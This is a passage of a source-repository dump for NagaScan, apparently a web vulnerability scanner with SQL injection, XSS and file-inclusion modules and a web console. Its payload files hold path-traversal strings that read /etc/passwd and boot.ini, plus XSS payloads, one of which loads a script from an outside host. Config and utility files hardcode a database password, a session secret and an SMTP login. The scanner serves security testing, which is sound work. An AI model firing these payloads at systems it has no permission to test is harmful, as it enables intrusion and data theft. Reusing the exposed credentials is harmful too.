├── parser
    ├── lib
    │   ├── __init__.py
    │   ├── utils.py
    │   └── db_operation.py
    ├── parser_mitmproxy.py
    └── parser_burp.py
├── scanner
    ├── lib
    │   ├── __init__.py
    │   ├── utils.py
    │   ├── hack_requests.py
    │   └── hack_sqlmapapi.py
    ├── payloads
    │   ├── fi_verify.txt
    │   ├── fi.txt
    │   └── xss.txt
    ├── scan_sqli.py
    ├── scan_xss.py
    └── scan_fi.py
├── www
    ├── favicon.ico
    ├── transwarp
    │   ├── __init__.py
    │   └── orm.py
    ├── static
    │   ├── fonts
    │   │   ├── FontAwesome.otf
    │   │   ├── fontawesome-webfont.eot
    │   │   ├── fontawesome-webfont.ttf
    │   │   └── fontawesome-webfont.woff
    │   ├── css
    │   │   ├── nagascan.css
    │   │   └── addons
    │   │   │   ├── uikit.addons.min.css
    │   │   │   ├── uikit.almost-flat.addons.min.css
    │   │   │   └── uikit.gradient.addons.min.css
    │   └── js
    │   │   ├── sticky.min.js
    │   │   ├── html5.js
    │   │   ├── md5.js
    │   │   └── nagascan.js
    ├── config_override.py
    ├── config_default.py
    ├── utils.py
    ├── config.py
    ├── wsgiapp.py
    ├── pymonitor.py
    ├── templates
    │   ├── manage_user_list.html
    │   ├── signin.html
    │   ├── register.html
    │   ├── __base__.html
    │   ├── manage_request_list.html
    │   ├── manage_scan_add.html
    │   ├── manage_scan_edit.html
    │   ├── manage_request_view.html
    │   ├── manage_scan_view.html
    │   ├── manage_vulns_list.html
    │   └── manage_exclusion_view.html
    ├── models.py
    └── apis.py
├── picture
    ├── webconsole.jpeg
    ├── exclusion_1.jpeg
    ├── exclusion_2.jpeg
    └── sqlmapserver.jpeg
├── proxy
    └── proxy_mitmproxy.py
├── README.md
└── schema.sql


/parser/lib/__init__.py:
--------------------------------------------------------------------------------
1 | 


--------------------------------------------------------------------------------
/scanner/lib/__init__.py:
--------------------------------------------------------------------------------
1 | 


--------------------------------------------------------------------------------
/www/favicon.ico:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/5up3rc/NagaScan/HEAD/www/favicon.ico


--------------------------------------------------------------------------------
/www/transwarp/__init__.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 |  


--------------------------------------------------------------------------------
/picture/webconsole.jpeg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/5up3rc/NagaScan/HEAD/picture/webconsole.jpeg


--------------------------------------------------------------------------------
/picture/exclusion_1.jpeg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/5up3rc/NagaScan/HEAD/picture/exclusion_1.jpeg


--------------------------------------------------------------------------------
/picture/exclusion_2.jpeg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/5up3rc/NagaScan/HEAD/picture/exclusion_2.jpeg


--------------------------------------------------------------------------------
/picture/sqlmapserver.jpeg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/5up3rc/NagaScan/HEAD/picture/sqlmapserver.jpeg


--------------------------------------------------------------------------------
/www/static/fonts/FontAwesome.otf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/5up3rc/NagaScan/HEAD/www/static/fonts/FontAwesome.otf


--------------------------------------------------------------------------------
/www/static/css/nagascan.css:
--------------------------------------------------------------------------------
1 | /*
2 |  * custom css
3 |  */
4 | a:hover, a:active {
5 |     text-decoration: none;
6 | }
7 | 


--------------------------------------------------------------------------------
/www/static/fonts/fontawesome-webfont.eot:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/5up3rc/NagaScan/HEAD/www/static/fonts/fontawesome-webfont.eot


--------------------------------------------------------------------------------
/www/static/fonts/fontawesome-webfont.ttf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/5up3rc/NagaScan/HEAD/www/static/fonts/fontawesome-webfont.ttf


--------------------------------------------------------------------------------
/www/static/fonts/fontawesome-webfont.woff:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/5up3rc/NagaScan/HEAD/www/static/fonts/fontawesome-webfont.woff


--------------------------------------------------------------------------------
/www/config_override.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | # -*- coding: utf-8 -*-
 3 | 
 4 | '''
 5 | Override configurations.
 6 | '''
 7 | 
 8 | __author__ = 'avfisher'
 9 | 
10 | configs = {
11 |     'db': {
12 |         'host': '127.0.0.1',
13 |         'user': 'root',
14 |         'password': 'toor'
15 |     }
16 | }
17 | 


--------------------------------------------------------------------------------
/www/config_default.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | # -*- coding: utf-8 -*-
 3 | 
 4 | __author__ = 'avfisher'
 5 | 
 6 | '''
 7 | Default configurations.
 8 | '''
 9 | 
10 | configs = {
11 |     'db': {
12 |         'host': '127.0.0.1',
13 |         'port': 3306,
14 |         'user': 'root',
15 |         'password': 'toor',
16 |         'database': 'nagascan'
17 |     },
18 |     'session': {
19 |         'secret': 'Bb\UIk#Z)TKe5$KB'
20 |     }
21 | }
22 | 


--------------------------------------------------------------------------------
/scanner/payloads/fi_verify.txt:
--------------------------------------------------------------------------------
 1 | java.io.FileNotFoundException\:
 2 | java.lang.Exception\:
 3 | java.lang.IllegalArgumentException\:
 4 | java.net.MalformedURLException\:
 5 | The server encountered an internal error \(.*\) that prevented it from fulfilling this request.
 6 | fread\(\)\:
 7 | for inclusion '\(include_path=
 8 | Failed opening requiredv
 9 | &lt;b&gt;Warning&lt;/b&gt;\:  file\(
10 | &lt;b&gt;Warning&lt;/b&gt;\:  file_get_contents\(
11 | root:x\:0\:0\:root\:
12 | Warning\: fopen\(
13 | No such file or directory
14 | 


--------------------------------------------------------------------------------
/scanner/payloads/fi.txt:
--------------------------------------------------------------------------------
 1 | ../../../../../../../../../../../../../../../boot.ini
 2 | ../../../../../../../../../../../../../../../boot.ini.html
 3 | C:\boot.ini
 4 | C:\boot.ini.html
 5 | %SYSTEMROOT%\win.ini
 6 | %SYSTEMROOT%\win.ini
 7 | %SYSTEMROOT%\win.ini.html
 8 | ../../../../../../../../../../../../../../../etc/passwd%00.html
 9 | /etc/passwd%00.html
10 | ../../../../../../../../../../../../../../../etc/passwd
11 | ../../../../../../../../../../../../../../../etc/passwd%00
12 | ../../../../../../../../../../../../../../../etc/passwd%0a
13 | ../../../../../../../../../../../../../../../etc/passwd%0d
14 | ../../../../../../../../../../../../../../../etc/passwd%0a%0d
15 | ../../../../../../../../../../../../../../../etc/passwd.html
16 | ....//....//....//....//....//....//....//....//....//....//etc/passwd
17 | ../../../../../../../../../../../../../../../../etc/passwd%00
18 | ....//....//....//....//....//....//....//....//....//....//etc/passwd%00
19 | /etc/passwd
20 | 


--------------------------------------------------------------------------------
/parser/lib/utils.py:
--------------------------------------------------------------------------------
 1 | # -*- coding: utf-8 -*-
 2 | 
 3 | import MySQLdb
 4 | import smtplib
 5 | import time
 6 | from email.mime.text import MIMEText
 7 | 
 8 | def highlight(content, color, ENVIRONMENT='Linux'):
 9 |     if ENVIRONMENT=='Linux':
10 |         if color == "red":
11 |             content = "\033[1;31;40m{}\033[0m".format(content)
12 |         if color == "green":
13 |             content = "\033[1;32;40m{}\033[0m".format(content)
14 |         if color == "yellow":
15 |             content = "\033[1;33;40m{}\033[0m".format(content)
16 |         if color == "blue":
17 |             content = "\033[1;34;40m{}\033[0m".format(content)
18 |     return content
19 | 
20 | def escape_content(content):
21 |     content = MySQLdb.escape_string(content)
22 |     return content
23 | 
24 | def logging(log_file, content):
25 |     f=open(log_file,'a')
26 |     now = time.strftime('%Y-%m-%d %H:%M:%S',time.localtime(time.time()))
27 |     f.write(str(now)+': '+content.strip()+'\n')
28 |     f.close
29 | 


--------------------------------------------------------------------------------
/www/utils.py:
--------------------------------------------------------------------------------
 1 | # -*- coding: utf-8 -*-
 2 | 
 3 | import bleach
 4 | from reform import HtmlEncode
 5 | 
 6 | def content_escape(content):
 7 |     if isinstance(content, list):
 8 |         escaped_content = []
 9 |         for item in content:
10 |             escaped_item = {}
11 |             for key, value in item.items():
12 |                 escaped_item[key] = bleach.clean(value)
13 |             escaped_content.append(escaped_item)
14 |     elif isinstance(content, str):
15 |         escaped_content = bleach.clean(content)
16 |     else:
17 |         escaped_content = content
18 |     return escaped_content
19 | 
20 | def html_encode(content):
21 |     if isinstance(content, list):
22 |         encode_content = []
23 |         for item in content:
24 |             encode_item = {}
25 |             for key, value in item.items():
26 |                 try:
27 |                     encode_item[key] = HtmlEncode(str(value))
28 |                 except Exception, err:
29 |                     encode_item[key] = HtmlEncode(value.encode('utf-8'))
30 |             encode_content.append(encode_item)
31 |     elif isinstance(content, str):
32 |         try:
33 |             encode_content = HtmlEncode(content)
34 |         except Exception, err:
35 |             encode_content = HtmlEncode(content.encode('utf-8'))
36 |     else:
37 |         encode_content = content
38 |     return encode_content
39 | 


--------------------------------------------------------------------------------
/scanner/payloads/xss.txt:
--------------------------------------------------------------------------------
 1 | <script src=http://t.cn/RMFxJrP></script>
 2 | </script>"><script>prompt(1)</script>
 3 | </ScRiPt>"><ScRiPt>prompt(1)</ScRiPt>
 4 | "><img src=x onerror=prompt(1)>
 5 | "><svg/onload=prompt(1)>
 6 | "><iframe/src=javascript:prompt(1)>
 7 | "><h1 onclick=prompt(1)>Clickme</h1>
 8 | "><a href=javascript:prompt(1)>Clickme</a>
 9 | "><a href="javascript:confirm%28 1%29">Clickme</a>
10 | "><a href="data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+">click</a>
11 | "><textarea autofocus onfocus=prompt(1)>
12 | "><a/href=javascript&colon;co\u006efir\u006d&#40;&quot;1&quot;&#41;>clickme</a>
13 | "><script>co\u006efir\u006d`1`</script>
14 | "><ScRiPt>co\u006efir\u006d`1`</ScRiPt>
15 | "><img src=x onerror=co\u006efir\u006d`1`>
16 | "><svg/onload=co\u006efir\u006d`1`>
17 | "><iframe/src=javascript:co\u006efir\u006d%28 1%29>
18 | "><h1 onclick=co\u006efir\u006d(1)>Clickme</h1>
19 | "><a href=javascript:prompt%28 1%29>Clickme</a>
20 | "><a href="javascript:co\u006efir\u006d%28 1%29">Clickme</a>
21 | "><textarea autofocus onfocus=co\u006efir\u006d(1)>
22 | "><details/ontoggle=co\u006efir\u006d`1`>clickmeonchrome
23 | "><p/id=1%0Aonmousemove%0A=%0Aconfirm`1`>hoveme
24 | "><img/src=x%0Aonerror=prompt`1`>
25 | "><iframe srcdoc="&lt;img src&equals;x:x onerror&equals;alert&lpar;1&rpar;&gt;">
26 | "><h1/ondrag=co\u006efir\u006d`1`)>DragMe</h1>
27 | XSS_RANDOM_FLAG_{yuweyAAAA923892389328nsdsdjjkmxcmxnm}
28 | 


--------------------------------------------------------------------------------
/www/config.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | # -*- coding: utf-8 -*-
 3 | 
 4 | '''
 5 | Configuration
 6 | '''
 7 | 
 8 | __author__ = 'avfisher'
 9 | 
10 | import config_default
11 | 
12 | class Dict(dict):
13 |     '''
14 |     Simple dict but support access as x.y style.
15 |     '''
16 |     def __init__(self, names=(), values=(), **kw):
17 |         super(Dict, self).__init__(**kw)
18 |         for k, v in zip(names, values):
19 |             self[k] = v
20 | 
21 |     def __getattr__(self, key):
22 |         try:
23 |             return self[key]
24 |         except KeyError:
25 |             raise AttributeError(r"'Dict' object has no attribute '%s'" % key)
26 | 
27 |     def __setattr__(self, key, value):
28 |         self[key] = value
29 | 
30 | def merge(defaults, override):
31 |     r = {}
32 |     for k, v in defaults.iteritems():
33 |         if k in override:
34 |             if isinstance(v, dict):
35 |                 r[k] = merge(v, override[k])
36 |             else:
37 |                 r[k] = override[k]
38 |         else:
39 |             r[k] = v
40 |     return r
41 | 
42 | def toDict(d):
43 |     D = Dict()
44 |     for k, v in d.iteritems():
45 |         D[k] = toDict(v) if isinstance(v, dict) else v
46 |     return D
47 | 
48 | configs = config_default.configs
49 | 
50 | try:
51 |     import config_override
52 |     configs = merge(configs, config_override.configs)
53 | except ImportError:
54 |     pass
55 | 
56 | configs = toDict(configs)
57 | 


--------------------------------------------------------------------------------
/www/wsgiapp.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | # -*- coding: utf-8 -*-
 3 | 
 4 | __author__ = 'avfisher'
 5 | 
 6 | '''
 7 | A WSGI application entry.
 8 | '''
 9 | 
10 | import logging; logging.basicConfig(level=logging.INFO)
11 | 
12 | import os, time
13 | from datetime import datetime
14 | 
15 | from transwarp import db
16 | from transwarp.web import WSGIApplication, Jinja2TemplateEngine
17 | 
18 | from config import configs
19 | 
20 | def datetime_filter(t):
21 |     delta = int(time.time() - t)
22 |     if delta < 60:
23 |         return u'1分钟前'
24 |     if delta < 3600:
25 |         return u'%s分钟前' % (delta // 60)
26 |     if delta < 86400:
27 |         return u'%s小时前' % (delta // 3600)
28 |     if delta < 604800:
29 |         return u'%s天前' % (delta // 86400)
30 |     dt = datetime.fromtimestamp(t)
31 |     return u'%s年%s月%s日' % (dt.year, dt.month, dt.day)
32 | 
33 | # init db:
34 | db.create_engine(**configs.db)
35 | 
36 | # init wsgi app:
37 | wsgi = WSGIApplication(os.path.dirname(os.path.abspath(__file__)))
38 | 
39 | template_engine = Jinja2TemplateEngine(os.path.join(os.path.dirname(os.path.abspath(__file__)), 'templates'))
40 | template_engine.add_filter('datetime', datetime_filter)
41 | 
42 | wsgi.template_engine = template_engine
43 | 
44 | import urls
45 | 
46 | wsgi.add_interceptor(urls.user_interceptor)
47 | wsgi.add_interceptor(urls.manage_interceptor)
48 | wsgi.add_module(urls)
49 | 
50 | if __name__ == '__main__':
51 |     wsgi.run(80, host='0.0.0.0')
52 | else:
53 |     application = wsgi.get_wsgi_application()
54 | 


--------------------------------------------------------------------------------
/scanner/lib/utils.py:
--------------------------------------------------------------------------------
 1 | # -*- coding: utf-8 -*-
 2 | 
 3 | import MySQLdb
 4 | import smtplib
 5 | import time
 6 | from email.mime.text import MIMEText
 7 | 
 8 | def highlight(content, color, ENVIRONMENT='Linux'):
 9 |     if ENVIRONMENT=='Linux':
10 |         if color == "red":
11 |             content = "\033[1;31;40m{}\033[0m".format(content)
12 |         if color == "green":
13 |             content = "\033[1;32;40m{}\033[0m".format(content)
14 |         if color == "yellow":
15 |             content = "\033[1;33;40m{}\033[0m".format(content)
16 |         if color == "blue":
17 |             content = "\033[1;34;40m{}\033[0m".format(content)
18 |     return content
19 | 
20 | def escape_content(content):
21 |     content = MySQLdb.escape_string(content)
22 |     return content
23 | 
24 | def send_mail(to_list,sub,content):
25 |     mail_host="smtp.126.com"
26 |     mail_user="zz790786477"
27 |     mail_pass="Security123!"
28 |     mail_postfix="126.com"
29 | 
30 |     me="Security Alert"+"<"+mail_user+'@'+mail_postfix+">"
31 |     msg = MIMEText(content,_subtype='plain',_charset='utf-8')  #gb2312
32 |     msg['Subject'] = sub
33 |     msg['From'] = me
34 |     msg['To'] = ";".join(to_list)
35 |     try:
36 |         server = smtplib.SMTP()
37 |         server.connect(mail_host)
38 |         server.login(mail_user,mail_pass)
39 |         server.sendmail(me, to_list, msg.as_string())
40 |         server.close()
41 |         return True
42 |     except Exception, e:
43 |         print str(e)
44 |         return False
45 | 
46 | def logging(log_file, content):
47 |     f=open(log_file,'a')
48 |     now = time.strftime('%Y-%m-%d %H:%M:%S',time.localtime(time.time()))
49 |     f.write(str(now)+': '+content.strip()+'\n')
50 |     f.close
51 | 


--------------------------------------------------------------------------------
/www/pymonitor.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | # -*- coding: utf-8 -*-
 3 | 
 4 | __author__ = 'avfisher'
 5 | 
 6 | import os, sys, time, subprocess
 7 | 
 8 | from watchdog.observers import Observer
 9 | from watchdog.events import FileSystemEventHandler
10 | 
11 | def log(s):
12 |     print '[Monitor] %s' % s
13 | 
14 | class MyFileSystemEventHander(FileSystemEventHandler):
15 | 
16 |     def __init__(self, fn):
17 |         super(MyFileSystemEventHander, self).__init__()
18 |         self.restart = fn
19 | 
20 |     def on_any_event(self, event):
21 |         if event.src_path.endswith('.py'):
22 |             log('Python source file changed: %s' % event.src_path)
23 |             self.restart()
24 | 
25 | command = ['echo', 'ok']
26 | process = None
27 | 
28 | def kill_process():
29 |     global process
30 |     if process:
31 |         log('Kill process [%s]...' % process.pid)
32 |         process.kill()
33 |         process.wait()
34 |         log('Process ended with code %s.' % process.returncode)
35 |         process = None
36 | 
37 | def start_process():
38 |     global process, command
39 |     log('Start process %s...' % ' '.join(command))
40 |     process = subprocess.Popen(command, stdin=sys.stdin, stdout=sys.stdout, stderr=sys.stderr)
41 | 
42 | def restart_process():
43 |     kill_process()
44 |     start_process()
45 | 
46 | def start_watch(path, callback):
47 |     observer = Observer()
48 |     observer.schedule(MyFileSystemEventHander(restart_process), path, recursive=True)
49 |     observer.start()
50 |     log('Watching directory %s...' % path)
51 |     start_process()
52 |     try:
53 |         while True:
54 |             time.sleep(0.5)
55 |     except KeyboardInterrupt:
56 |         observer.stop()
57 |     observer.join()
58 | 
59 | if __name__ == '__main__':
60 |     argv = sys.argv[1:]
61 |     if not argv:
62 |         print('Usage: ./pymonitor your-script.py')
63 |         exit(0)
64 |     if argv[0]!='python':
65 |         argv.insert(0, 'python')
66 |     command = argv
67 |     path = os.path.abspath('.')
68 |     start_watch(path, None)
69 | 


--------------------------------------------------------------------------------
/www/static/js/sticky.min.js:
--------------------------------------------------------------------------------
1 | /*! UIkit 2.6.0 | http://www.getuikit.com | (c) 2014 YOOtheme | MIT License */
2 | 
3 | !function(a){"function"==typeof define&&define.amd&&define("uikit-sticky",["uikit"],function(){return jQuery.fn.uksticky||a(window,window.jQuery,window.jQuery.UIkit)}),window&&window.jQuery&&window.jQuery.UIkit&&a(window,window.jQuery,window.jQuery.UIkit)}(function(a,b,c){var d={top:0,bottom:0,clsactive:"uk-active",clswrapper:"uk-sticky",getWidthFrom:""},e=b(window),f=b(document),g=[],h=e.height(),i=function(){for(var a=e.scrollTop(),c=f.height(),d=c-h,i=a>d?d-a:0,j=0;j<g.length;j++)if(g[j].stickyElement.is(":visible")){var k=g[j],l=k.stickyWrapper.offset().top,m=l-k.top-i;if(m>=a)null!==k.currentTop&&(k.stickyElement.css({position:"",top:"",width:""}).parent().removeClass(k.clsactive),k.currentTop=null);else{var n=c-k.stickyElement.outerHeight()-k.top-k.bottom-a-i;n=0>n?n+k.top:k.top,k.currentTop!=n&&(k.stickyElement.css({position:"fixed",top:n,width:k.stickyElement.width()}),"undefined"!=typeof k.getWidthFrom&&k.stickyElement.css("width",b(k.getWidthFrom).width()),k.stickyElement.parent().addClass(k.clsactive),k.currentTop=n)}}},j=function(){h=e.height()},k={init:function(a){var c=b.extend({},d,a);return this.each(function(){var a=b(this);if(!a.data("sticky")){var d=a.attr("id")||"s"+Math.ceil(1e4*Math.random()),e=b("<div></div>").attr("id","sticky-"+d).addClass(c.clswrapper);a.wrapAll(e),"right"==a.css("float")&&a.css({"float":"none"}).parent().css({"float":"right"}),a.data("sticky",!0);var f=a.parent();f.css("height",a.outerHeight()),g.push({top:c.top,bottom:c.bottom,stickyElement:a,currentTop:null,stickyWrapper:f,clsactive:c.clsactive,getWidthFrom:c.getWidthFrom})}})},update:i};return window.addEventListener("scroll",i,!1),window.addEventListener("resize",j,!1),b.fn.uksticky=function(a){return k[a]?k[a].apply(this,Array.prototype.slice.call(arguments,1)):"object"!=typeof a&&a?void b.error("Method "+a+" does not exist on jQuery.sticky"):k.init.apply(this,arguments)},b(document).on("uk-domready",function(){setTimeout(function(){i(),b("[data-uk-sticky]").each(function(){var a=b(this);a.data("sticky")||a.uksticky(c.Utils.options(a.attr("data-uk-sticky")))})},0)}),b.fn.uksticky});


--------------------------------------------------------------------------------
/www/static/js/html5.js:
--------------------------------------------------------------------------------
1 | /**
2 | * @preserve HTML5 Shiv prev3.7.1 | @afarkas @jdalton @jon_neal @rem | MIT/GPL2 Licensed
3 | */
4 | !function(a,b){function c(a,b){var c=a.createElement("p"),d=a.getElementsByTagName("head")[0]||a.documentElement;return c.innerHTML="x<style>"+b+"</style>",d.insertBefore(c.lastChild,d.firstChild)}function d(){var a=s.elements;return"string"==typeof a?a.split(" "):a}function e(a){var b=r[a[p]];return b||(b={},q++,a[p]=q,r[q]=b),b}function f(a,c,d){if(c||(c=b),k)return c.createElement(a);d||(d=e(c));var f;return f=d.cache[a]?d.cache[a].cloneNode():o.test(a)?(d.cache[a]=d.createElem(a)).cloneNode():d.createElem(a),!f.canHaveChildren||n.test(a)||f.tagUrn?f:d.frag.appendChild(f)}function g(a,c){if(a||(a=b),k)return a.createDocumentFragment();c=c||e(a);for(var f=c.frag.cloneNode(),g=0,h=d(),i=h.length;i>g;g++)f.createElement(h[g]);return f}function h(a,b){b.cache||(b.cache={},b.createElem=a.createElement,b.createFrag=a.createDocumentFragment,b.frag=b.createFrag()),a.createElement=function(c){return s.shivMethods?f(c,a,b):b.createElem(c)},a.createDocumentFragment=Function("h,f","return function(){var n=f.cloneNode(),c=n.createElement;h.shivMethods&&("+d().join().replace(/[\w\-:]+/g,function(a){return b.createElem(a),b.frag.createElement(a),'c("'+a+'")'})+");return n}")(s,b.frag)}function i(a){a||(a=b);var d=e(a);return!s.shivCSS||j||d.hasCSS||(d.hasCSS=!!c(a,"article,aside,dialog,figcaption,figure,footer,header,hgroup,main,nav,section{display:block}mark{background:#FF0;color:#000}template{display:none}")),k||h(a,d),a}var j,k,l="3.7.0",m=a.html5||{},n=/^<|^(?:button|map|select|textarea|object|iframe|option|optgroup)$/i,o=/^(?:a|b|code|div|fieldset|h1|h2|h3|h4|h5|h6|i|label|li|ol|p|q|span|strong|style|table|tbody|td|th|tr|ul)$/i,p="_html5shiv",q=0,r={};!function(){try{var a=b.createElement("a");a.innerHTML="<xyz></xyz>",j="hidden"in a,k=1==a.childNodes.length||function(){b.createElement("a");var a=b.createDocumentFragment();return"undefined"==typeof a.cloneNode||"undefined"==typeof a.createDocumentFragment||"undefined"==typeof a.createElement}()}catch(c){j=!0,k=!0}}();var s={elements:m.elements||"abbr article aside audio bdi canvas data datalist details dialog figcaption figure footer header hgroup main mark meter nav output progress section summary template time video",version:l,shivCSS:m.shivCSS!==!1,supportsUnknownElements:k,shivMethods:m.shivMethods!==!1,type:"default",shivDocument:i,createElement:f,createDocumentFragment:g};a.html5=s,i(b)}(this,document);


--------------------------------------------------------------------------------
/scanner/scan_sqli.py:
--------------------------------------------------------------------------------
 1 | # -*- coding: utf-8 -*-
 2 | 
 3 | """ SQL Injection Scanner
 4 | 
 5 | This module provides functions that scan SQL Injection.
 6 | 
 7 | """
 8 | 
 9 | import time, random
10 | from lib.db_operation import db_query, update_scan_result, fetch_request, is_checked, get_request_info, fetch_exclusion_scan, get_scan_exclusion_info, get_sqlmap_info, fetch_sqlmap
11 | from lib.utils import highlight
12 | from lib.hack_sqlmapapi import HackSqlmapApi
13 | 
14 | 
15 | def scan_sqli_request(request_info, sqlmapapi_server):
16 |     delim = '.............................................\n'
17 |     try:
18 |         if not is_checked(request_info['rid'], 'scan_sqli'):
19 |             print highlight('[*] request id: {}'.format(request_info['rid']), 'green')
20 |             print highlight('[*] sqlmapapi server: {}'.format(sqlmapapi_server), 'green')
21 |             run_scan_sqli = HackSqlmapApi(sqlmapapi_server, request_info)
22 |             run_scan_sqli.run()
23 |             if len(run_scan_sqli.data) == 0:
24 |                 result_sqli = 'not vulnerable'
25 |                 poc_sqli = ''
26 |             else:
27 |                 result_sqli = 'vulnerable'
28 |                 poc_sqli = str(run_scan_sqli.data)
29 |             update_scan_result(request_info['rid'], 'scan_sqli', 'result_sqli', result_sqli, 'poc_sqli', poc_sqli, 'response_sqli', poc_sqli)
30 |             print delim
31 |     except Exception, err:
32 |         print highlight('[!] error: {}'.format(str(err)), 'red')
33 |         print delim
34 |         pass
35 | 
36 | def scanner(request):
37 |     sqlmapapi_servers = []
38 |     sqlmaps = fetch_sqlmap()
39 |     for sqlmap in sqlmaps:
40 |         sqlmap_info = get_sqlmap_info(sqlmap)
41 |         sqlmapapi = "http://{}:{}/".format(sqlmap_info['ip'], sqlmap_info['port'])
42 |         sqlmapapi_servers.append(sqlmapapi)
43 |     if len(sqlmapapi_servers) > 0:
44 |         sqlmapapi_server = random.sample(sqlmapapi_servers, 1)[0]
45 |     else:
46 |         sqlmapapi_server = 'http://127.0.0.1:8775/'
47 |     request_info = get_request_info(request)
48 |     scan_sqli_request(request_info, sqlmapapi_server)
49 | 
50 | def main():
51 |     exclude = get_scan_exclusion_info(fetch_exclusion_scan(1)[0])
52 |     limit_num = 10000 # Number of limit of requests
53 |     scan_type = 'scan_sqli'
54 |     requests = fetch_request(exclude, scan_type, limit_num)
55 |     if requests:
56 |         for request in requests:
57 |             scanner(request)
58 |     else:
59 |         print highlight("[!] no new request found", 'yellow')
60 | 
61 | 
62 | if __name__ == "__main__":
63 |     while True:
64 |         now = time.strftime('%Y-%m-%d %H:%M:%S',time.localtime(time.time()))
65 |         delim = '.............................................'
66 |         print "[*][{}] Time: {}\n{}".format('SQL Injection Scan', highlight(str(now), 'green'), delim)
67 |         main()
68 |         time.sleep(5)
69 |         print delim, '\n'
70 | 


--------------------------------------------------------------------------------
/www/templates/manage_user_list.html:
--------------------------------------------------------------------------------
 1 | {% extends '__base__.html' %}
 2 | 
 3 | {% block title %}Users{% endblock %}
 4 | 
 5 | {% block beforehead %}
 6 | 
 7 | <script>
 8 | 
 9 | function initVM(data) {
10 |     $('#div-users').show();
11 |     var vm = new Vue({
12 |         el: '#div-users',
13 |         data: {
14 |             users: data.users,
15 |             page: data.page
16 |         },
17 |         methods: {
18 |             previous: function () {
19 |                 gotoPage(this.page.page_index - 1);
20 |             },
21 |             next: function () {
22 |                 gotoPage(this.page.page_index + 1);
23 |             }
24 |         }
25 |     });
26 | }
27 | 
28 | $(function() {
29 |     getApi('/api/users?page={{ page_index }}', function (err, results) {
30 |         if (err) {
31 |             return showError(err);
32 |         }
33 |         $('#div-loading').hide();
34 |         initVM(results);
35 |     });
36 | });
37 | 
38 | </script>
39 | 
40 | {% endblock %}
41 | 
42 | {% block content %}
43 | 
44 |     <div class="uk-width-1-1">
45 |         <div class="uk-alert uk-alert-danger uk-hidden"></div>
46 |     </div>
47 | 
48 |     <div id="div-users" class="uk-width-1-1" style="display:none">
49 |         <table class="uk-table uk-table-hover">
50 |             <thead>
51 |                 <tr>
52 |                     <th class="uk-width-4-10">Username</th>
53 |                     <th class="uk-width-4-10">Email</th>
54 |                     <th class="uk-width-2-10">Registered Time</th>
55 |                 </tr>
56 |             </thead>
57 |             <tbody>
58 |                 <tr v-repeat="user: users" >
59 |                     <td>
60 |                         <span v-text="user.name"></span>
61 |                         <span v-if="user.admin" style="color:#d05"><i class="uk-icon-key"></i> Administrator</span>
62 |                     </td>
63 |                     <td>
64 |                         <a v-attr="href: 'mailto:'+user.email" v-text="user.email"></a>
65 |                     </td>
66 |                     <td>
67 |                         <span v-text="user.created_at.toDateTime()"></span>
68 |                     </td>
69 |                 </tr>
70 |             </tbody>
71 |         </table>
72 |         <div class="uk-width-1-1 uk-text-center">
73 |             <ul class="uk-pagination">
74 |                 <li v-if="! page.has_previous" class="uk-disabled"><span><i class="uk-icon-angle-double-left"></i></span></li>
75 |                 <li v-if="page.has_previous"><a v-on="click: previous()" href="#0"><i class="uk-icon-angle-double-left"></i></a></li>
76 |                 <li class="uk-active"><span v-text="page.page_index"></span></li>
77 |                 <li v-if="! page.has_next" class="uk-disabled"><span><i class="uk-icon-angle-double-right"></i></span></li>
78 |                 <li v-if="page.has_next"><a v-on="click: next()" href="#0"><i class="uk-icon-angle-double-right"></i></a></li>
79 |             </ul>
80 |         </div>
81 |     </div>
82 | 
83 |     <div id="div-loading" class="uk-width-1-1 uk-text-center">
84 |         <span><i class="uk-icon-spinner uk-icon-medium uk-icon-spin"></i> loading...</span>
85 |     </div>
86 | {% endblock %}
87 | 


--------------------------------------------------------------------------------
/www/templates/signin.html:
--------------------------------------------------------------------------------
 1 | <!DOCTYPE html>
 2 | <html class="uk-height-1-1">
 3 | <head>
 4 |     <meta charset="utf-8" />
 5 |     <title>Sign In - NagaScan v1.0</title>
 6 |     <!--[if lt IE 9]>
 7 |     <script src="https://oss.maxcdn.com/libs/html5shiv/3.7.0/html5shiv.js"></script>
 8 |     <script src="https://oss.maxcdn.com/libs/respond.js/1.4.2/respond.min.js"></script>
 9 |     <![endif]-->
10 |     <link rel="stylesheet" href="/static/css/uikit.min.css">
11 |     <link rel="stylesheet" href="/static/css/uikit.gradient.min.css">
12 |     <script src="/static/js/jquery.min.js"></script>
13 |     <script src="/static/js/md5.js"></script>
14 |     <script src="/static/js/uikit.min.js"></script>
15 |     <script src="/static/js/vue.min.js"></script>
16 |     <script src="/static/js/nagascan.js"></script>
17 |     <script>
18 | 
19 | $(function() {
20 |     var vm = new Vue({
21 |         el: '#form-signin',
22 |         data: {
23 |             email: '',
24 |             password: '',
25 |             remember: false
26 |         },
27 |         methods: {
28 |             submit: function (event) {
29 |                 event.preventDefault();
30 |                 var email = this.email.trim().toLowerCase();
31 |                 showError();
32 |                 startLoading();
33 |                 postApi('/api/authenticate', {
34 |                     email: email,
35 |                     password: CryptoJS.MD5(this.password).toString(),
36 |                     remember: this.remember
37 |                 }, function (err, result) {
38 |                     if (err) {
39 |                         showError(err);
40 |                     }
41 |                     else {
42 |                         return location.assign(result.admin ? '/manage/' : '/');
43 |                     }
44 |                     stopLoading();
45 |                 });
46 |             }
47 |         }
48 |     });
49 | })
50 | 
51 |     </script>
52 | </head>
53 | <body class="uk-height-1-1">
54 |     <div class="uk-vertical-align uk-text-center uk-height-1-1">
55 |         <div class="uk-vertical-align-middle" style="width: 320px">
